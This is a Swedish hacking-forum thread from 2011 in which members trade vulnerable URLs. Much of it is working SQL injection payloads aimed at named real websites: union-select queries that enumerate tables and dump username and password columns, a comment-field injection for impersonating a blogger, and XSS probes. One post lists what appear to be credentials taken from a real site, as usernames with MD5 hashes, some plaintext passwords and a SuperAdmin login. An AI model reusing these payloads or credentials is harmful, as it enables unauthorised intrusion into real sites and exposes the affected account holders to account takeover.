1. Dator och IT
  2. IT-säkerhet

Samling av sidor med säkerhetsbrister - Del 2

Svara
2011-05-18, 00:28
  #2857
vicious
Medlem
Citat:
Ursprungligen postat av fooztr
Hjälp med denna tack:
http://www.matguiden.se/recept/recep...on=show&id=113

Kod: 
http://www.matguiden.se/recept/recept.php?action=show&id=null%20union%20all%20select%201,group_concat%28table_name%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,1  7,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50  ,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79%20from%20inf  ormation_schema.tables--

trött?
Citera
2011-05-18, 01:42
  #2858
ercij
Medlem
Tror många kommer kunna ha kul med denna

http://www.apg29.se/

En enkel SQL inject i form av:

Christer Åberg' #

i användarnamnfältet när du kommenterar och det kommer se ut som att du postar som den ökände bloggaren bakom apg29
Citera
2011-05-18, 17:22
  #2859
fooztr
Medlem
fooztrs avatar
Haha jag prövade bara upp till 33 innan jag la av. Tänkte att någon annan kunde slösa sin tid

Citat:
Ursprungligen postat av vicious
Kod: 
http://www.matguiden.se/recept/recept.php?action=show&id=null%20union%20all%20select%201,group_concat%28table_name%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,1  7,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50  ,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79%20from%20inf  ormation_schema.tables--

trött?
Citera
2011-05-18, 20:29
  #2860
Gh0sted
Medlem
Gh0steds avatar
http://djungel.se/model.php?ID=188418
Citera
2011-05-18, 22:06
  #2861
Gh0sted
Medlem
Gh0steds avatar
https://low-cost-dedicated.com/custo...()+limit+0,1--

http://www.defunctgames.com/shows.ph...rs+limit+0,1--

http://geekxgirls.com/article.php?ID...a=database()--
__________________
Senast redigerad av Gh0sted 2011-05-18 kl. 22:13.
Citera
2011-05-19, 14:49
  #2862
tmxseven
Medlem
tmxsevens avatar
XSS
Kod: 
http://www.pointshop.se/helpdesk/faq.asp?showCategory=<script>alert('xss')</script>
http://www.pointshop.se/feedback.asp?feedbackType=needLogin&headline=<script>alert('xss')</script>

SQLi
Kod: 
http://www.pointshop.se/helpdesk/ticket_v3.asp?step=2&category=5
http://www.pointshop.se/ep_usercallback.asp?show=frames&cid=6859&uid=&part=step3
http://www.pointshop.se/shop_cashback_pictures.asp?show=182656
Citera
2011-05-19, 17:41
  #2863
fooztr
Medlem
fooztrs avatar
Kod: 
http://www.kupa.pl/pl/humor.php?id=16'
http://www.litoralmania.com.br/humor.php?id=49'
http://www.gbritain.net/humor.php?id=2'
http://www.middagsdags.se/recept.php?id=79
http://www.lupiga.com/recepti/recept.php?id=34'
http://www.matguiden.se/recept/recept.php?action=show&id=113'
http://www.newtalent.se/rosta.php?model_id=1857&last_model_id='1857&gender=2&rating=0
http://www.akutgruppen.com/index.php?menuitem='3&PHPSESSID=a6dbf365888d5591bc1fd4d79a735387
http://www.infoom.se/mysite/index.php?k='474&sida=21
http://www.lyckasmedmat.nu/recept.asp?menyid=3

Kod: 
http://www.akutgruppen.com/index.php?menuitem=-3/**/union/**/all/**/select/**/1,2,@@version,4,5,6,7--
http://www.akutgruppen.com/index.php?menuitem=-3/**/union/**/all/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7/**/from/**/users--
http://motoroldies.se/index.php?menuitem=32+order+by+6--
__________________
Senast redigerad av fooztr 2011-05-19 kl. 17:48.
Citera
2011-05-19, 21:44
  #2864
j3r01
Medlem
Kod: 
http://www.akutgruppen.com/index.php?menuitem=3

Kod: 
HannaW:3dc668424e120b11fa199a9252965af7
MelindaR:0ad6b8d80124b01b0bd7f7e168820e4f
SonyaF:ee077a4cdd6dc2cd26cded6db444831f
PyeJ:larsdotter
ChristinaL:0efde2c979e57bd1120015c798e78348
JennyM:atlantic
MirjaF:89c46eccf79e9548a5dab804368481b2
IsabelleD:f967c7a7306599378190f05825b23260
ThereseG:0fb4ff5b7f0327e9b91270ef01aa2053
MalinB:4dbb875334cef4494816e1c4ba9864e7
EvalenaM:1ad394a910a27181f0b06fdb4a3afa86
KatjaH:921f4663fa6682ae153a4b2df0ba3966
RolandJ:acfb90c90fbba82349ea3cd1a7c2b0f5
HelenaL:kompis
StefanK:5e176a9c33c99cd991058c51ab245d5a
AnetteF:jesus
SaraK:3efef8877a2f8ef6e80b661983bc96c3
JennyL:2863b9d46340bc7f42af4d75f595c5e7
LinaL:bbc11d2ce9185938b38d093275714e30
LinneaS:a38e99b1e48f4905b667846433577050
AnetteZ:66bf18aa8e929268014ada08e2eec522
SuperAdmin:pillepill
CarinaK:e42506c8ae55aa151063fcf12d322a23
Citera
2011-05-19, 23:03
  #2865
Tomtengoeswild
Medlem
Swepirates.org:

Kod: 
SQL Error

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'FROM torrents WHERE ADDDATE(added, INTERVAL 8 DAY) > NOW()' at line 1
in /opt/lampp/htdocs/swepirate.org/index.php, line 356
Citera
2011-05-20, 13:46
  #2866
tmxseven
Medlem
tmxsevens avatar
Tre företag som skapar hemsidor åt andra stora företag:
http://www.dreamsandbytes.com/
http://www.magiclick.com/
http://www.hiperaktif.com/

Hittar man säkerhetshål där så finns det säkert liknande på deras klienter's sidor.
Citera
2011-05-20, 14:53
  #2867
MelanotanX
Medlem
http://www.apg29.se/kommentar.php?komid=79919
Citera
2011-05-20, 15:03
  #2868
Gh0sted
Medlem
Gh0steds avatar
Citat:
Ursprungligen postat av tmxseven
Tre företag som skapar hemsidor åt andra stora företag:
http://www.dreamsandbytes.com/
http://www.magiclick.com/
http://www.hiperaktif.com/

Hittar man säkerhetshål där så finns det säkert liknande på deras klienter's sidor.

http://www.hiperaktif.com/ENG/Projects.aspx?pid=1'

Kan inte testa mer för tillfället men den kan vara sårbar.
Citera
Svara

Skapa ett konto eller logga in för att kommentera

Du måste vara medlem för att kunna kommentera

Skapa ett konto

Det är enkelt att registrera ett nytt konto

Bli medlem

Logga in

Har du redan ett konto? Logga in här

Logga in